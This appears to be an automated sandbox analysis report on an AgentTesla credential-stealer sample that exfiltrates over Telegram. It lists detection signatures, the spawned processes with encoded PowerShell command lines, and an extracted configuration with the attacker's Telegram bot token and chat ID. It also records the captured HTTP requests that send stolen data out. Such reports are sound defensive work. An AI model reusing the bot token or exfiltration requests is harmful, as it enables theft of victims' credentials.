
Windows Analysis Report
izwFjkhFJm.exe

Overview

General Information

Sample Name: izwFjkhFJm.exe
Original Sample Name: ae2a3b41292c66a9dd6f10c874c05293.exe
Analysis ID: 830846
MD5: ae2a3b41292c66a9dd6f10c874c05293
SHA1: caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
SHA256: 65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
Tags: AgentTesla, exe, Telegram

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • izwFjkhFJm.exe (PID: 324 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 6076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • izwFjkhFJm.exe (PID: 1784 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2108 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2312 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2948 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • Oefdyik.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Oefdyik.exe (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • Oefdyik.exe (PID: 6036 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • kDPmkTm.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 4852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Oefdyik.exe (PID: 4700 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kDPmkTm.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • cleanup
Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Yara Matches (memory dumps)

Source | Rule | Description | Author
0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Process Memory Space: izwFjkhFJm.exe PID: 2948 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara Matches (unpacked PE files)

Source | Rule | Description | Author
0.2.izwFjkhFJm.exe.5440000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Sigma Overview

No Sigma rule has matched

Snort IDS Alerts

Timestamp: 03/20/23-18:33:24.869717
Source: 192.168.2.3:49715 -> Destination: 149.154.167.220:443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/20/23-18:31:36.462231
Source: 192.168.2.3:49701 -> Destination: 149.154.167.220:443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected


              AV Detection

Source: izwFjkhFJm.exe | ReversingLabs: Detection: 33%
Source: izwFjkhFJm.exe | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | ReversingLabs: Detection: 33%
Source: izwFjkhFJm.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Joe Sandbox ML: detected
Source: 0.2.izwFjkhFJm.exe.38b9d00.2.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: Oefdyik.exe.6036.27.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Source: izwFjkhFJm.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: izwFjkhFJm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp

              Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49701 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49715 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org (2 queries)
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org (6 queries)
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org (6 queries)
Source: unknown | DNS query: name: api.ipify.org (6 queries)
Source: Yara match | File source: 0.2.izwFjkhFJm.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5f
  Host: api.telegram.org
  Content-Length: 972
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8db297197376642
  Host: api.telegram.org
  Content-Length: 972
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 173.231.16.76
Source: global traffic | HTTP traffic detected (3 identical requests):
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.c
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
              Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
              Source: Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
